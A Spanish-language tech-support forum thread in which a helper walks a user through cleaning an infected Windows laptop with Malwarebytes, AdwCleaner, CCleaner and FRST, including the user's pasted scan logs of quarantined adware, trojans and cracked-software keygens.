Portatil infectado

Buenas noches.

Despues de muchos años libre de estos bichos, ahora que desgraciadamente estan mas de moda que nunca (los virus) mi ordenador tambien ha sido infectado. Pasando un antivirus creo que algo he quitado, el ordenador por lo menos no va muy lento ni se queda pillado, hoy por lo menos. Pero creo que aun tengo algun virus, troyano, o lo que sea.

Me guiais por favor.

Muchas gracias.

Hola @fran50, Bienvenido al foro!!!

Realiza los siguientes pasos, aunque hayas hecho alguno, sin cambiar el orden:

1) Descarga, actualiza y ejecuta Malwarebytes’ Anti-Malware, revisa en detalle el manual, para que sepas usarlo y configurarlo.

• Realiza un Análisis personalizado, actualizando si te lo pide.
• Pulsar en “Cuarentena seleccionado” para enviarlo a la cuarentena y Reinicias el sistema.
• En el apartado del manual Historial de detecciones encontrarás el reporte de MBAM, clic en Exportar >> Copiar al portapapeles.

2) Descarga AdwCleaner | InfoSpyware en el escritorio.

• Desactiva temporalmente el Antivirus >> Cómo deshabilitar temporalmente su Antivirus.
• Cierra también todos los programas que tengas abiertos.
• Ejecuta Adwcleaner.exe (Si usas Windows Vista/7 u 8 presiona clic derecho y selecciona "Ejecutar como Administrador".)
• Pulsar en el botón Escanear, y espera a que se realice el proceso, inmediatamente pulsa sobre el botón Limpiar.
• Espera a que se complete y sigue las instrucciones, si te pidiera Reiniciar el sistema Aceptas.
• Guardas el reporte que te aparecerá, para copiarlo y pegarlo en tu próxima respuesta.
• El informe también se puede encontrar en C:\AdwCleaner\AdwCleaner[C1].txt

3) Descarga CCleaner

• Instala Ccleaner
• Abres Ccleaner en la pestaña limpiador dejas como esta configurada predeterminadamente, haces clic en analizar esperas que termine >> clic en ejecutar limpiador
• Clic en la pestaña Registro >> clic en buscar problemas esperas que termine >> clic en Reparar Seleccionadas y haces una copia de seguridad
• Vuelves a darle clic en buscar problemas hasta que no encuentre ninguno.

Pega los reportes de Malwarebytes y AdwCleaner y comentas como va el problema.

¿Cómo pegar reportes en el foro?

Un saludo

Muchas gracias Daniela por ayudarme. En el primer paso ya hay problemas, no puedo instalar Malwarebytes, me aparece un mensaje de fallo en la instalacion. He mirado en el foro y he visto que a otros usuarios que les ha pasado les han recomendado desinstalar 360 total security; he hecho como decian, con revo uninstaler en modo avanzado; he reiniciado el pc porque al final decia que quedaban residuos que se borrarian al reiniciar. He probado de nuevo a instalar malwarebytes, y el mismo error en la instalacion.

Alguna recomendacion?

Gracias.

Hola de nuevo. Me apresuro a anular la ayuda para instalar Malwarebytes, ya lo he hecho. El caso es que no se habia desinstalado 360 total security, no se porque ya que use revo uninstaller para ello en su modo avanzado; es mas he intentado desinstalar de nuevo con revo y con aplicaciones y caracteristicas de windows pero ya no aparecia el programa. El caso que estaba ahi y lo he desinstalado con el archivo desinstalador que habia en su carpeta.

Gracias.

Hola

Ahora que ya has podido instalar Malwarebytes, realiza los pasos que te indiqué.

Un saludo

Hola.

Despues de varias horas de analisis de Malwarebytes a un buen ritmo, el analisis se ralentizo y en estos momentos despues de mas de 21 horas de analisis lleva 737.000 elementos analizados, 46 detecciones y no parece que vaya a terminar pronto; al menos si sirve de orientacion la rayita verde que va rellenando el icono del programa que aparece en la barra de tareas, esta casi igual que hace 12 horas, es decir, esta rellena (de verde) unos dos tercios. Me parece que esto no va a acabar, no se si tendria que pararlo y poner los resultados hasta el momento (en las ultimas 12 horas no ha hecho nuevas detecciones).

Saludos.

Hola Daniela.

Por fin he podido hacer todos los pasos. Espero haberlos hecho bien.

Pego a continuacion los reportes. De AdwCleaner tenia dos logs y los he puesto los dos por si era necesario.

Dentro de lo poco que he podido comprobar el ordenador, no tiene mala pinta. Si me gustaria saber si podia recibir algun consejo de algun antivirus y/o antimalware y/o optimizador gratuito para tener el pc con la maxima salud posible.

Pues Daniela, espero algun consejo si surge despues de ver los reportes. Una vez mas, muchas gracias.

Malwarebytes
www.malwarebytes.com

-Detalles del registro-
Fecha del análisis: 8/5/20
Hora del análisis: 13:03
Archivo de registro: 8a9b4ac4-911b-11ea-ab7d-c85b766b5d50.json

-Información del software-
Versión: 4.1.0.56
Versión de los componentes: 1.0.896
Versión del paquete de actualización: 1.0.23618
Licencia: Prueba

-Información del sistema-
SO: Windows 10 (Build 18362.778)
CPU: x64
Sistema de archivos: NTFS
Usuario: LAPTOP-IUVNOHHJ\Javi

-Resumen del análisis-
Tipo de análisis: Análisis personalizado
Análisis iniciado por:: Manual
Resultado: Completado
Objetos analizados: 865583
Amenazas detectadas: 46
Amenazas en cuarentena: 46
Tiempo transcurrido: 22 hr, 42 min, 39 seg

-Opciones de análisis-
Memoria: Activado
Inicio: Activado
Sistema de archivos: Activado
Archivo: Activado
Rootkits: Activado
Heurística: Activado
PUP: Detectar
PUM: Detectar

-Detalles del análisis-
Proceso: 0
(No hay elementos maliciosos detectados)

Módulo: 0
(No hay elementos maliciosos detectados)

Clave del registro: 12
PUP.Optional.Conduit, HKLM\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES\{0633EE93-D776-472F-A0FF-E1416B8B2E3A}, En cuarentena, 194, 236865, , , , 
PUP.Optional.Conduit, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES\{0633EE93-D776-472F-A0FF-E1416B8B2E3A}, En cuarentena, 194, 236865, , , , 
PUP.Optional.Conduit, HKU\S-1-5-21-290510076-2018776080-814419295-1001\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}, En cuarentena, 194, 236865, 1.0.23618, , ame, 
PUP.Optional.AuslogicsDriverUpdater, HKLM\SOFTWARE\WOW6432NODE\AUSLOGICS\Driver Updater, En cuarentena, 3523, 341776, 1.0.23618, , ame, 
PUP.Optional.AuslogicsDriverUpdater, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\{23BB1B18-3537-48F7-BEF7-42BC65DBF993}_IS1, En cuarentena, 3523, 769158, 1.0.23618, , ame, 
PUP.Optional.AdvancedSystemCare, HKLM\SYSTEM\CURRENTCONTROLSET\SERVICES\IOBIT_MONITOR_SERVER, En cuarentena, 3831, 580520, 1.0.23618, , ame, 
Trojan.Glupteba.E, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TASKS\{A789461C-19A0-41C0-9F51-DB8F5230DF72}, En cuarentena, 493, 781223, , , , 
Trojan.Glupteba.E, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\LOGON\{A789461C-19A0-41C0-9F51-DB8F5230DF72}, En cuarentena, 493, 781223, , , , 
Trojan.Glupteba.E, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TREE\ScheduledUpdate, En cuarentena, 493, 781223, 1.0.23618, , ame, 
PUP.Optional.AuslogicsDriverUpdater, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TREE\Auslogics\Driver Updater\Scan, En cuarentena, 3523, 818931, , , , 
PUP.Optional.AuslogicsDriverUpdater, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TASKS\{0E22041F-ED0F-489E-BA5B-46CF77CC428D}, En cuarentena, 3523, 818931, , , , 
PUP.Optional.AuslogicsDriverUpdater, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\PLAIN\{0E22041F-ED0F-489E-BA5B-46CF77CC428D}, En cuarentena, 3523, 818931, , , , 

Valor del registro: 10
PUP.Optional.Conduit, HKU\S-1-5-21-290510076-2018776080-814419295-1001\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}|URL, En cuarentena, 194, 236865, 1.0.23618, , ame, 
PUP.Optional.Conduit, HKU\S-1-5-21-290510076-2018776080-814419295-1001\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}|TOPRESULTURL, En cuarentena, 194, 236865, 1.0.23618, , ame, 
PUP.Optional.AuslogicsDriverUpdater, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\{23BB1B18-3537-48F7-BEF7-42BC65DBF993}_IS1|INNO SETUP: APP PATH, En cuarentena, 3523, 769158, 1.0.23618, , ame, 
PUP.Optional.AuslogicsDriverUpdater, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\{23BB1B18-3537-48F7-BEF7-42BC65DBF993}_IS1|INSTALLLOCATION, En cuarentena, 3523, 769158, 1.0.23618, , ame, 
PUP.Optional.AuslogicsDriverUpdater, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\{23BB1B18-3537-48F7-BEF7-42BC65DBF993}_IS1|INNO SETUP: ICON GROUP, En cuarentena, 3523, 769158, 1.0.23618, , ame, 
PUP.Optional.AuslogicsDriverUpdater, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\{23BB1B18-3537-48F7-BEF7-42BC65DBF993}_IS1|DISPLAYNAME, En cuarentena, 3523, 769158, 1.0.23618, , ame, 
PUP.Optional.AuslogicsDriverUpdater, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\{23BB1B18-3537-48F7-BEF7-42BC65DBF993}_IS1|DISPLAYICON, En cuarentena, 3523, 769158, 1.0.23618, , ame, 
PUP.Optional.AuslogicsDriverUpdater, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\{23BB1B18-3537-48F7-BEF7-42BC65DBF993}_IS1|UNINSTALLSTRING, En cuarentena, 3523, 769158, 1.0.23618, , ame, 
PUP.Optional.AuslogicsDriverUpdater, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\{23BB1B18-3537-48F7-BEF7-42BC65DBF993}_IS1|QUIETUNINSTALLSTRING, En cuarentena, 3523, 769158, 1.0.23618, , ame, 
PUP.Optional.AdvancedSystemCare, HKLM\SYSTEM\CURRENTCONTROLSET\SERVICES\IOBIT_MONITOR_SERVER|IMAGEPATH, En cuarentena, 3831, 580520, 1.0.23618, , ame, 

Datos del registro: 1
PUP.Optional.Conduit, HKU\S-1-5-21-290510076-2018776080-814419295-1001\SOFTWARE\MICROSOFT\INTERNET EXPLORER\MAIN|START PAGE, Sustituido, 194, 293058, 1.0.23618, , ame, 

Secuencia de datos: 0
(No hay elementos maliciosos detectados)

Carpeta: 4
PUP.Optional.AuslogicsDriverUpdater, C:\Program Files (x86)\Auslogics\Driver Updater, En cuarentena, 3523, 818931, 1.0.23618, , ame, 
PUP.Optional.AuslogicsDriverUpdater, C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Auslogics\Driver Updater, En cuarentena, 3523, 341779, 1.0.23618, , ame, 
PUP.Optional.AuslogicsDriverUpdater, C:\ProgramData\Auslogics\Driver Updater, En cuarentena, 3523, 818932, 1.0.23618, , ame, 
PUP.Optional.AuslogicsDriverUpdater, C:\Windows\System32\Tasks\Auslogics\Driver Updater, En cuarentena, 3520, 341781, 1.0.23618, , ame, 

Archivo: 19
PUP.Optional.AuslogicsDriverUpdater, C:\WINDOWS\SYSTEM32\TASKS\Auslogics\Driver Updater\Scan, En cuarentena, 3523, 818931, , , , 
PUP.Optional.AuslogicsDriverUpdater, C:\PROGRAM FILES (X86)\AUSLOGICS\DRIVER UPDATER\TASKSCHEDULERHELPER.DLL, En cuarentena, 3523, 818931, 1.0.23618, , ame, 
PUP.Optional.AuslogicsDriverUpdater, C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Auslogics\Driver Updater\Auslogics Driver Updater on the Web.url, En cuarentena, 3523, 341779, , , , 
PUP.Optional.AuslogicsDriverUpdater, C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Auslogics\Driver Updater\Auslogics Driver Updater.lnk, En cuarentena, 3523, 341779, , , , 
PUP.Optional.AuslogicsDriverUpdater, C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Auslogics\Driver Updater\Uninstall Auslogics Driver Updater.lnk, En cuarentena, 3523, 341779, , , , 
Malware.Generic.4229473235, C:\SYSTEM VOLUME INFORMATION\SYSTEMRESTORE\FRSTAGING\USERS\JAVI\VIDEOS\WONDERSHARE.FILMORA.9.4.6.2.MULTILENGUAJE.ES.INC.CRACK-\PATCH\FILMORA9 PATCH BY THIRDZKY.EXE, En cuarentena, 1000000, 0, 1.0.23618, D7586F715D8BE6E4FC18A3D3, dds, 00710445
PUP.Optional.Amazon1Button, C:\USERS\JAVI\APPDATA\ROAMING\MOZILLA\FIREFOX\PROFILES\QWAGR2AF.DEFAULT-1539189531436\EXTENSIONS\[email protected], En cuarentena, 3198, 493346, 1.0.23618, , ame, 
PUP.Optional.Conduit, C:\USERS\JAVI\APPDATA\ROAMING\MOZILLA\FIREFOX\PROFILES\QWAGR2AF.DEFAULT-1539189531436\PREFS.JS, Sustituido, 194, 301520, 1.0.23618, , ame, 
PUP.Optional.AuslogicsDriverUpdater, C:\USERS\JAVI\DESKTOP\AUSLOGICS DRIVER UPDATER.LNK, En cuarentena, 3523, 341778, 1.0.23618, , ame, 
Generic.Malware/Suspicious, C:\USERS\JAVI\DOCUMENTS\PROGRAMAS\CCLEANER.V5.66.7716.PRO.BUSINESS.TECH.MULTILENGUAJE.ES.INC.SERIAL\CCLEANERPROACTIVATOR\CCLEANERPROACTIVATOR.EXE, En cuarentena, 0, 392686, 1.0.23618, , shuriken, 
RiskWare.Agent.Keygen, C:\USERS\JAVI\DOCUMENTS\PROGRAMAS\CCLEANER.V5.66.7716.PRO.BUSINESS.TECH.MULTILENGUAJE.ES.INC.SERIAL\PIRIFORM.ALL.PRODUCTS.KEYGEN-CORE\CR-PIRIFORM.EXE, En cuarentena, 7962, 352886, 1.0.23618, B53F264D906D7484DB892D9F, dds, 00710445
Malware.Generic.4229473235, C:\USERS\JAVI\DOCUMENTS\PROGRAMAS\WONDERSHARE.FILMORA.9.4.6.2.MULTILENGUAJE.ES.INC.CRACK-\PATCH\FILMORA9 PATCH BY THIRDZKY.EXE, En cuarentena, 1000000, 0, 1.0.23618, D7586F715D8BE6E4FC18A3D3, dds, 00710445
Generic.Malware/Suspicious, C:\USERS\JAVI\DOWNLOADS\AUSLOGICS.DRIVER.UPDATER.V1.24.0.0.MULTILENGUAJE.ES.INC.CRACK\DRIVER-UPDATER-SETUP.EXE, En cuarentena, 0, 392686, 1.0.23618, , shuriken, 
HackTool.WinActivator, C:\USERS\JAVI\DOWNLOADS\WINDOWS DESCARGAS\MICROSOFT WINDOWS 10 TH2 RTM MSDN ESP.X64\_ACTIVAD_RES\RE-LOADER_BYR_1N_V21FINAL_SVN18012016_2150.ZIP, En cuarentena, 7936, 595564, 1.0.23618, BBD58F8613FE79E4F090C35C, dds, 00710445
Ransom.Mamo, C:\USERS\JAVI\DOWNLOADS\COGER OTRO EASEUS.DATA.RECOVERY.WIZARD.TECH.13.3.MULTILENGUAJE.ES.INC.CRACK.KEYGEN\CRACK\KEYGEN.RAR, En cuarentena, 7588, 772195, 1.0.23618, 8CD7CF1AE319AF56FCF0C880, dds, 00710445
Ransom.Mamo, C:\USERS\JAVI\DOWNLOADS\COGER OTRO EASEUS.DATA.RECOVERY.WIZARD.TECH.13.3.MULTILENGUAJE.ES.INC.CRACK.KEYGEN\CRACK\KEYGEN.EXE, En cuarentena, 7588, 772195, 1.0.23618, 8CD7CF1AE319AF56FCF0C880, dds, 00710445
HackTool.FilePatch, C:\USERS\JAVI\DOWNLOADS\MOVAVI PHOTO EDITOR V6.4.0.MULTILENGUAJE.ES.INC.CRACK-X64\PATCH.RAR, En cuarentena, 7529, 281135, 1.0.23618, 2335858C56377C0EFA288A38, dds, 00710445
Trojan.MalPack.GS, C:\WINDOWS\SYSTEM32\CONFIG\SYSTEMPROFILE\APPDATA\LOCAL\MICROSOFT\WINDOWS\INETCACHE\IE\APP[1].EXE, En cuarentena, 8206, 817856, 1.0.23618, 16B5AAA64A4CBA669AA768EF, dds, 00710445
Trojan.MalPack.GS, C:\WINDOWS\SYSTEM32\CONFIG\SYSTEMPROFILE\APPDATA\LOCALLOW\MICROSOFT\CRYPTNETURLCACHE\CONTENT\829226B0FB58B4903A5513D04E3201C4, En cuarentena, 8206, 819478, 1.0.23618, , ame, 

Sector físico: 0
(No hay elementos maliciosos detectados)

WMI: 0
(No hay elementos maliciosos detectados)


(end)

# -------------------------------
# Malwarebytes AdwCleaner 8.0.4.0
# -------------------------------
# Build:    04-03-2020
# Database: 2020-04-08.2 (Cloud)
# Support:  https://www.malwarebytes.com/support
#
# -------------------------------
# Mode: Clean
# -------------------------------
# Start:    05-09-2020
# Duration: 00:00:29
# OS:       Windows 10 Home
# Cleaned:  44
# Failed:   0


***** [ Services ] *****

No malicious services cleaned.

***** [ Folders ] *****

Deleted       C:\Program Files (x86)\Common Files\IObit\Advanced SystemCare
Deleted       C:\ProgramData\54F3DE4E-B7BA-4EBD-8B3B-385D272CC583
Deleted       C:\ProgramData\Application Data\Lavasoft\Web Companion
Deleted       C:\ProgramData\BSD\DriverHive
Deleted       C:\ProgramData\BSD\DriverHiveEngine
Deleted       C:\ProgramData\FA87C1D4
Deleted       C:\ProgramData\Host App Service
Deleted       C:\ProgramData\IObit\Advanced SystemCare
Deleted       C:\Users\Default\AppData\Local\Host App Service
Deleted       C:\Users\Javi\AppData\LocalLow\IObit\Advanced SystemCare
Deleted       C:\Users\Javi\AppData\Local\DriverToolkit
Deleted       C:\Users\Javi\AppData\Local\Host App Service
Deleted       C:\Users\Javi\AppData\Roaming\IObit\Advanced SystemCare
Deleted       C:\Users\Javi\AppData\Roaming\MPC
Deleted       C:\Windows\ServiceProfiles\LocalService\AppData\Local\Host App Service
Deleted       C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Host App Service
Deleted       C:\Windows\SysWOW64\config\systemprofile\AppData\Roaming\IObit\Advanced SystemCare
Deleted       C:\Windows\rss

***** [ Files ] *****

Deleted       C:\Users\Public\Desktop\ScreenShot.lnk
Deleted       C:\Windows\System32\Tasks_Migrated\App Explorer

***** [ DLL ] *****

No malicious DLLs cleaned.

***** [ WMI ] *****

No malicious WMI cleaned.

***** [ Shortcuts ] *****

No malicious shortcuts cleaned.

***** [ Tasks ] *****

Deleted       C:\Windows\System32\Tasks\APP EXPLORER

***** [ Registry ] *****

Deleted       HKCU\Software\BSD
Deleted       HKCU\Software\Host App Service
Deleted       HKCU\Software\Lavasoft\Web Companion
Deleted       HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run|cloudnet
Deleted       HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\webcompanion.com
Deleted       HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\Host App Service
Deleted       HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{B59A5BDD-FC01-4E9F-81DE-3B6647D4DA58} 
Deleted       HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\App Explorer
Deleted       HKLM\Software\Wow6432Node\BSD
Deleted       HKLM\Software\Wow6432Node\IOBIT\ASC
Deleted       HKLM\Software\Wow6432Node\IObit\Advanced SystemCare
Deleted       HKLM\Software\Wow6432Node\Lavasoft\Web Companion

***** [ Chromium (and derivatives) ] *****

No malicious Chromium entries cleaned.

***** [ Chromium URLs ] *****

No malicious Chromium URLs cleaned.

***** [ Firefox (and derivatives) ] *****

No malicious Firefox entries cleaned.

***** [ Firefox URLs ] *****

No malicious Firefox URLs cleaned.

***** [ Hosts File Entries ] *****

No malicious hosts file entries cleaned.

***** [ Preinstalled Software ] *****

Deleted       Preinstalled.LenovoPower2Go   Registry   HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run32|CLMLServer_For_P2G8
Deleted       Preinstalled.LenovoPower2Go   Registry   HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run32|CLVirtualDrive
Deleted       Preinstalled.LenovoPowerDVD   Registry   HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{0ABB54E5-323C-4557-9631-4BB8742BE88D} 
Deleted       Preinstalled.LenovoPowerDVD   Registry   HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\PDVDServ12 Task
Deleted       Preinstalled.LenovoPowerDVD   Registry   HKLM\Software\Wow6432Node\\Microsoft\Windows\CurrentVersion\Uninstall\InstallShield_{B46BEA36-0B71-4A4E-AE41-87241643FA0A}
Deleted       Preinstalled.LenovoPowerDVD   Registry   HKLM\Software\Wow6432Node\\Microsoft\Windows\CurrentVersion\Uninstall\{B46BEA36-0B71-4A4E-AE41-87241643FA0A}
Deleted       Preinstalled.LenovoPowerDVD   Task   C:\Windows\System32\Tasks\PDVDSERV12 TASK
Deleted       Preinstalled.LenovoQuickOptimizer   Folder   C:\Program Files\LENOVO\QUICKOPTIMIZER
Deleted       Preinstalled.LenovoQuickOptimizer   Registry   HKLM\Software\Microsoft\Windows\CurrentVersion\Uninstall\{8D2C871B-1B9F-45AC-9C43-2BB18089CDFA}
Deleted       Preinstalled.LenovoServiceBridge   Folder   C:\Users\Javi\AppData\Local\PROGRAMS\LENOVO\LENOVO SERVICE BRIDGE
Deleted       Preinstalled.LenovoServiceBridge   Registry   HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\{2C74547D-EF88-47F4-85F5-BE46A31E26B7}_is1


*************************

[+] Delete Tracing Keys
[+] Reset Winsock

*************************

AdwCleaner[S00].txt - [6437 octets] - [09/05/2020 13:04:18]

########## EOF - C:\AdwCleaner\Logs\AdwCleaner[C00].txt ##########

# -------------------------------
# Malwarebytes AdwCleaner 8.0.4.0
# -------------------------------
# Build:    04-03-2020
# Database: 2020-04-08.2 (Cloud)
# Support:  https://www.malwarebytes.com/support
#
# -------------------------------
# Mode: Scan
# -------------------------------
# Start:    05-09-2020
# Duration: 00:01:45
# OS:       Windows 10 Home
# Scanned:  31802
# Detected: 53


***** [ Services ] *****

No malicious services found.

***** [ Folders ] *****

Adware.pokki                    C:\ProgramData\Host App Service
Adware.pokki                    C:\Users\Default\AppData\Local\Host App Service
Adware.pokki                    C:\Users\Javi\AppData\Local\Host App Service
Adware.pokki                    C:\Windows\ServiceProfiles\LocalService\AppData\Local\Host App Service
Adware.pokki                    C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Host App Service
PUP.Adware.Heuristic            C:\ProgramData\FA87C1D4
PUP.Optional.AdvancedSystemCare C:\Program Files (x86)\Common Files\IObit\Advanced SystemCare
PUP.Optional.AdvancedSystemCare C:\ProgramData\IObit\Advanced SystemCare
PUP.Optional.AdvancedSystemCare C:\Users\Javi\AppData\LocalLow\IObit\Advanced SystemCare
PUP.Optional.AdvancedSystemCare C:\Users\Javi\AppData\Roaming\IObit\Advanced SystemCare
PUP.Optional.AdvancedSystemCare C:\Windows\SysWOW64\config\systemprofile\AppData\Roaming\IObit\Advanced SystemCare
PUP.Optional.Legacy             C:\ProgramData\54F3DE4E-B7BA-4EBD-8B3B-385D272CC583
PUP.Optional.Legacy             C:\ProgramData\BSD\DriverHiveEngine
PUP.Optional.Legacy             C:\Users\Javi\AppData\Local\DriverToolkit
PUP.Optional.Legacy             C:\Users\Javi\AppData\Roaming\MPC
PUP.Optional.TweakBit           C:\ProgramData\BSD\DriverHive
PUP.Optional.WebCompanion       C:\ProgramData\Application Data\Lavasoft\Web Companion
Trojan.Agent                    C:\Windows\rss

***** [ Files ] *****

Adware.pokki                    C:\Windows\System32\Tasks_Migrated\App Explorer
PUP.Optional.Legacy             C:\Users\Public\Desktop\ScreenShot.lnk

***** [ DLL ] *****

No malicious DLLs found.

***** [ WMI ] *****

No malicious WMI found.

***** [ Shortcuts ] *****

No malicious shortcuts found.

***** [ Tasks ] *****

Adware.pokki                    C:\Windows\System32\Tasks\APP EXPLORER

***** [ Registry ] *****

Adware.pokki                    HKCU\Software\Host App Service
Adware.pokki                    HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\Host App Service
Adware.pokki                    HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{B59A5BDD-FC01-4E9F-81DE-3B6647D4DA58} 
Adware.pokki                    HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\App Explorer
PUP.Optional.AdvancedSystemCare HKLM\Software\Wow6432Node\IOBIT\ASC
PUP.Optional.AdvancedSystemCare HKLM\Software\Wow6432Node\IObit\Advanced SystemCare
PUP.Optional.DriverUpdatePlus   HKCU\Software\BSD
PUP.Optional.DriverUpdatePlus   HKLM\Software\Wow6432Node\BSD
PUP.Optional.Glupteba           HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run|cloudnet
PUP.Optional.WebCompanion       HKCU\Software\Lavasoft\Web Companion
PUP.Optional.WebCompanion       HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\webcompanion.com
PUP.Optional.WebCompanion       HKLM\Software\Wow6432Node\Lavasoft\Web Companion

***** [ Chromium (and derivatives) ] *****

No malicious Chromium entries found.

***** [ Chromium URLs ] *****

No malicious Chromium URLs found.

***** [ Firefox (and derivatives) ] *****

No malicious Firefox entries found.

***** [ Firefox URLs ] *****

No malicious Firefox URLs found.

***** [ Hosts File Entries ] *****

No malicious hosts file entries found.

***** [ Preinstalled Software ] *****

Preinstalled.LenovoIMController   Folder   C:\ProgramData\LENOVO\IMCONTROLLER 
Preinstalled.LenovoIMController   Folder   C:\Users\Javi\AppData\Local\LENOVO\IMCONTROLLER 
Preinstalled.LenovoIMController   Folder   C:\Windows\LENOVO\IMCONTROLLER 
Preinstalled.LenovoIMController   Folder   C:\Windows\System32\Tasks\LENOVO\IMCONTROLLER 
Preinstalled.LenovoIMController   Registry   HKLM\Software\Wow6432Node\\Microsoft\Windows\CurrentVersion\Uninstall\Lenovo Dependency Package_is1 
Preinstalled.LenovoPower2Go   Registry   HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run32|CLMLServer_For_P2G8 
Preinstalled.LenovoPower2Go   Registry   HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run32|CLVirtualDrive 
Preinstalled.LenovoPowerDVD   Registry   HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{0ABB54E5-323C-4557-9631-4BB8742BE88D}  
Preinstalled.LenovoPowerDVD   Registry   HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\PDVDServ12 Task 
Preinstalled.LenovoPowerDVD   Registry   HKLM\Software\Wow6432Node\\Microsoft\Windows\CurrentVersion\Uninstall\InstallShield_{B46BEA36-0B71-4A4E-AE41-87241643FA0A} 
Preinstalled.LenovoPowerDVD   Registry   HKLM\Software\Wow6432Node\\Microsoft\Windows\CurrentVersion\Uninstall\{B46BEA36-0B71-4A4E-AE41-87241643FA0A} 
Preinstalled.LenovoPowerDVD   Task   C:\Windows\System32\Tasks\PDVDSERV12 TASK 
Preinstalled.LenovoQuickOptimizer   Folder   C:\Program Files\LENOVO\QUICKOPTIMIZER 
Preinstalled.LenovoQuickOptimizer   Registry   HKLM\Software\Microsoft\Windows\CurrentVersion\Uninstall\{8D2C871B-1B9F-45AC-9C43-2BB18089CDFA} 
Preinstalled.LenovoServiceBridge   Folder   C:\Users\Javi\AppData\Local\PROGRAMS\LENOVO\LENOVO SERVICE BRIDGE 
Preinstalled.LenovoServiceBridge   Registry   HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\{2C74547D-EF88-47F4-85F5-BE46A31E26B7}_is1 
Preinstalled.LenovoUpdate   Folder   C:\Program Files (x86)\LENOVO\SYSTEM UPDATE 
Preinstalled.LenovoUpdate   Registry   HKLM\Software\Wow6432Node\\Classes\CLSID\{03C6CC92-68F2-4961-9A73-CAECA350BD08} 
Preinstalled.LenovoUpdate   Registry   HKLM\Software\Wow6432Node\\Microsoft\Windows\CurrentVersion\Uninstall\TVSU_is1 
Preinstalled.LenovoUtility   Registry   HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run|LenovoUtility 



########## EOF - C:\AdwCleaner\Logs\AdwCleaner[S00].txt ##########

Hola

Podrías utilizar como antivirus el Windows Defender, como antimalware puedes dejar instalado Malwarebytes, cuando pasen los 14 días no tendrás la protección real pero sigue funcionando igual los análisis y para limpiar/optimizar puedes dejar Ccleaner.

Tenías el equipo muy infectado, asi que vamos a ver si queda algo más por ahí.

Desactiva temporalmente el Antivirus >> Cómo deshabilitar temporalmente su Antivirus

Descarga Farbar Recovery Scan Tool.en el escritorio, seleccionando la versión adecuada para la arquitectura (32 o 64bits) de tu equipo. Como saber si Mi Windows es de 32 o 64 Bits ?.

• Ejecuta FRST.exe.
• En el mensaje de la ventana del Disclaimer, pulsamos Yes
• En la ventana principal pulsamos en el botón Scan y esperamos a que concluya el proceso.
• Se abrirán dos(2) archivos(Logs), Frst.txt y Addition.txt, estos quedaran grabados en el escritorio.

Pon los dos reportes generados.

